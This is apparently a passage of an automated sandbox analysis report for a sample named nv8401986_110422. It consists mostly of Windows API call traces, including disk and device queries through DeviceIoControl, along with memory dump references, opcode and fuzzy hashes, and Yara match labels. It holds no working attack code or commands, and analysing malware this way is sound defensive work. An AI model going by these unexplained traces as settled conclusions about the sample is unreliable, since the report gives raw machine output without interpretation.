                                                                                                                                                                                                          • API String ID: 4062629308-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: shared_ptr
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2025160788-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetVersionExW.KERNEL32(00000114,00000000,00000000), ref: 0048FCB4
                                                                                                                                                                                                            • Part of subcall function 0048F380: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0048F410
                                                                                                                                                                                                            • Part of subcall function 0048F380: DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 0048F459
                                                                                                                                                                                                            • Part of subcall function 0048FA50: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0048FAE0
                                                                                                                                                                                                            • Part of subcall function 0048FA50: DeviceIoControl.KERNEL32(00000000,0004D008,?,0000003C,?,0000022D,?,00000000), ref: 0048FB7F
                                                                                                                                                                                                            • Part of subcall function 0048F7E0: CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0048F85D
                                                                                                                                                                                                            • Part of subcall function 0048F7E0: DeviceIoControl.KERNEL32(00000000,002D1400,00000000,0000000C,?,00000800,00000000,00000000), ref: 0048F8D0
                                                                                                                                                                                                            • Part of subcall function 0048F5E0: CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0048F665
                                                                                                                                                                                                            • Part of subcall function 0048F5E0: DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 0048F6AE
                                                                                                                                                                                                            • Part of subcall function 0048F5E0: DeviceIoControl.KERNEL32(00000000,0007C088,00000000,00000021,00000000,00000221,?,00000000), ref: 0048F6F9
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ControlDevice$CreateFile$Version
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 393535756-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00475100: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00475132
                                                                                                                                                                                                            • Part of subcall function 00475100: allocator.LIBCONCRTD ref: 0047513F
                                                                                                                                                                                                            • Part of subcall function 00475100: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0047514A
                                                                                                                                                                                                            • Part of subcall function 00475100: construct.LIBCPMTD ref: 0047516E
                                                                                                                                                                                                            • Part of subcall function 00475100: construct.LIBCPMTD ref: 0047518E
                                                                                                                                                                                                            • Part of subcall function 00475100: construct.LIBCPMTD ref: 004751AE
                                                                                                                                                                                                          • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 004746BF
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Base::Concurrency::details::ContextIdentityQueueWorkconstruct$allocator
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2348496747-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00472B6B
                                                                                                                                                                                                            • Part of subcall function 00473190: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 004731CC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Base::Concurrency::details::ContextIdentityQueueWork
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2086788075-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00534B51: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00534B83
                                                                                                                                                                                                          • _free.LIBCMT ref: 00534001
                                                                                                                                                                                                            • Part of subcall function 005335AF: RtlFreeHeap.NTDLL(00000000,00000000,?,0053BA6B,?,00000000,?,00000000,?,0053BD0F,?,00000007,?,?,0053C0BE,?), ref: 005335C5
                                                                                                                                                                                                            • Part of subcall function 005335AF: GetLastError.KERNEL32(?,?,0053BA6B,?,00000000,?,00000000,?,0053BD0F,?,00000007,?,?,0053C0BE,?,?), ref: 005335D7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Heap$AllocateErrorFreeLast_free
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 314386986-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00534B83
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00514EBE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Exception@8Throw
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2005118841-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2353593579-0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3294499264.000000000C900000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C900000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c900000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: w
                                                                                                                                                                                                          • API String ID: 0-4266656565
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00473C80: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00473CB2
                                                                                                                                                                                                            • Part of subcall function 00473C80: allocator.LIBCONCRTD ref: 00473CBF
                                                                                                                                                                                                            • Part of subcall function 00473C80: construct.LIBCPMTD ref: 00473CE3
                                                                                                                                                                                                            • Part of subcall function 00473C80: construct.LIBCPMTD ref: 00473D03
                                                                                                                                                                                                            • Part of subcall function 00473C80: construct.LIBCPMTD ref: 00473D23
                                                                                                                                                                                                          • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00473B25
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: construct$Base::Concurrency::details::ContextIdentityQueueWork$allocator
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1129248848-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _DebugHeapAllocator.LIBCPMTD ref: 00472DA0
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocatorDebugHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 571936431-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • error_info_injector.LIBCPMTD ref: 00474268
                                                                                                                                                                                                            • Part of subcall function 004743B0: Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection.LIBCONCRTD ref: 004743BA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AsyncTask$CollectionCollection::~_Concurrency::details::_error_info_injector
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3071161433-0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3294499264.000000000C900000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C900000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c900000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: w
                                                                                                                                                                                                          • API String ID: 0-4266656565
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00490862
                                                                                                                                                                                                            • Part of subcall function 004A1170: GetModuleHandleW.KERNEL32(00000000), ref: 004A119B
                                                                                                                                                                                                            • Part of subcall function 004A1170: LoadCursorW.USER32(00000000,00007F00), ref: 004A11B2
                                                                                                                                                                                                            • Part of subcall function 004A1170: RegisterClassExW.USER32(00000030), ref: 004A11DB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ClassCursorHandleInitializeLoadModuleRegister
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2545979264-0
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b9c0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 8274e8c591281b398ec6d186a58511239557e5231fe303ded7ce58fe4e520c1e
                                                                                                                                                                                                          • Instruction ID: 1a9e480666f562c253df747b3c6cae20b4814e74e5eebd0ad0207e9e72b0294b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8274e8c591281b398ec6d186a58511239557e5231fe303ded7ce58fe4e520c1e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B162BC70A40204DBDB24CF94CA45BABBBF5EF85754F11854DE919AB282C771AC41CFA3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b9c0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 685fa46a66f5f6872f11340b53faf5f951da0e6768a73738b97467401234fecc
                                                                                                                                                                                                          • Instruction ID: b9a640f09803ffe75729143104be4310e6265158efbbd87473c7712d695083ff
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 685fa46a66f5f6872f11340b53faf5f951da0e6768a73738b97467401234fecc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C32DF30E403059BDB248F94CA80BABB7B9EF89710F11945ED915AB292D775E841CBA3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3298606801.000000000CF00000.00000010.00000800.00020000.00000000.sdmp, Offset: 0CF00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_cf00000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: de8bbb5fcbed417c4ac615396b0a474b58737ab42e44c16a5f810ea5315af8cd
                                                                                                                                                                                                          • Instruction ID: bf81fdb144666ea51482b0ff9b92bc8c833eb095c96ff0248043f1ea6b732ec9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: de8bbb5fcbed417c4ac615396b0a474b58737ab42e44c16a5f810ea5315af8cd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E312D330B002059FDB24CF45C984BBABBE2EF85B14F258259EA05AB3D1D770ED41DB92
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3304984035.000000000EC80000.00000010.00000800.00020000.00000000.sdmp, Offset: 0EC80000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_ec80000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e8ddb913ca03903adcc98d080926a04d83a0c6dcf0a44d3983f5a6294ce3e398
                                                                                                                                                                                                          • Instruction ID: cbde9ad9e7deaa6e4303fc0f7f516719b47801dfd5879f16f1054c8d74acd7f6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8ddb913ca03903adcc98d080926a04d83a0c6dcf0a44d3983f5a6294ce3e398
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50021570B003009FEB24EF55CB95FAAB7E5EB44718F104529E946AB386CBB5ED40CB61
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3291206257.000000000BEF1000.00000010.00000800.00020000.00000000.sdmp, Offset: 0BEF1000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bef1000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: adc3dc8cd6b23a45495fa39982c1606cb3510af4bcd8d9b5417f563d52e6924c
                                                                                                                                                                                                          • Instruction ID: 2752f285f1ae2fd1bce514052252ad80bc09cb0a764d4025d1cd23013fd732fd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: adc3dc8cd6b23a45495fa39982c1606cb3510af4bcd8d9b5417f563d52e6924c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38F1FB31E042429FEB24CFA4C980BAEBBB2BF84704F15A159D7556B3C6DB74E881CB51
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b9c0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3298606801.000000000CF00000.00000010.00000800.00020000.00000000.sdmp, Offset: 0CF00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_cf00000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3304984035.000000000EC80000.00000010.00000800.00020000.00000000.sdmp, Offset: 0EC80000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_ec80000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3298606801.000000000CF00000.00000010.00000800.00020000.00000000.sdmp, Offset: 0CF00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_cf00000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b9c0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3284841493.000000000ACD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0ACD0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_acd0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3298606801.000000000CF00000.00000010.00000800.00020000.00000000.sdmp, Offset: 0CF00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_cf00000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b9c0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b9c0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3294499264.000000000C900000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C900000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c900000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b9c0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3294559654.000000000C91A000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C91A000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c91a000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e629e58f55f3bb6da79177993fab1adb6476e5b2d44ce6d9e0cbb3578deef77c
                                                                                                                                                                                                          • Instruction ID: 4c9d072366d69ebd06f3f3502770f134c817d91aa9aec270d8aa2eb3b7a0d60e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e629e58f55f3bb6da79177993fab1adb6476e5b2d44ce6d9e0cbb3578deef77c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3071E070780219AFC720CF0AC592A76BBE6FF45764B15954AEC466B381C771FC81CBA1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3284841493.000000000ACD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0ACD0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_acd0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: ba90212a655ec5c76a95d2b37b5c1666a90afede4b01e7c12ae0ed3a4c843973
                                                                                                                                                                                                          • Instruction ID: a10a9c62da591904fed3052af60a95195029314f66dde9321fd56f3430d060b3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba90212a655ec5c76a95d2b37b5c1666a90afede4b01e7c12ae0ed3a4c843973
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE5169B1604304AFDB24CF58C941BA9B7E4EF44320F1A0A89FA49DB3A1E774DD41CB52
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b9c0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 81827e60a640b9fa513ec368db69f7ade4019944fcc3e8d4027223cd8209cfa3
                                                                                                                                                                                                          • Instruction ID: 657217df75c21536514e41d340ab239ee295aac618cf8e51f5fe2cac0d323c67
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81827e60a640b9fa513ec368db69f7ade4019944fcc3e8d4027223cd8209cfa3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E719F31E042058FCB24CF48C590AAAB7F6FF89310F29855ED815AB352D771EC81CB92
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b9c0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: ec504252b52a0ccc54ae9ab43c1970c234f74cbb47a702dbc5a0b19f59223a08
                                                                                                                                                                                                          • Instruction ID: 023485b7e37535b8f677cbc53eb1bb7e9da2e84859c3c40af6829785b51d302c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec504252b52a0ccc54ae9ab43c1970c234f74cbb47a702dbc5a0b19f59223a08
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7512B70E413019BEB305AE4CA85BABB79CEF44644F15145EE906A7382DB78AD818F73
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3301515219.000000000D7E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0D7E0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_d7e0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 0c18e8382b56bac31d45af90fa96777bd6c9c07f2af543a12105d6b1249094ba
                                                                                                                                                                                                          • Instruction ID: 54534c9f09b4425351900be7b021696217e71aa6b08bc8cb750c9c507ba73761
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c18e8382b56bac31d45af90fa96777bd6c9c07f2af543a12105d6b1249094ba
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D513231A442009FD724CF48C840BBAF3A9FF8A374F11815ED9699BB81CB70E941CB92
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
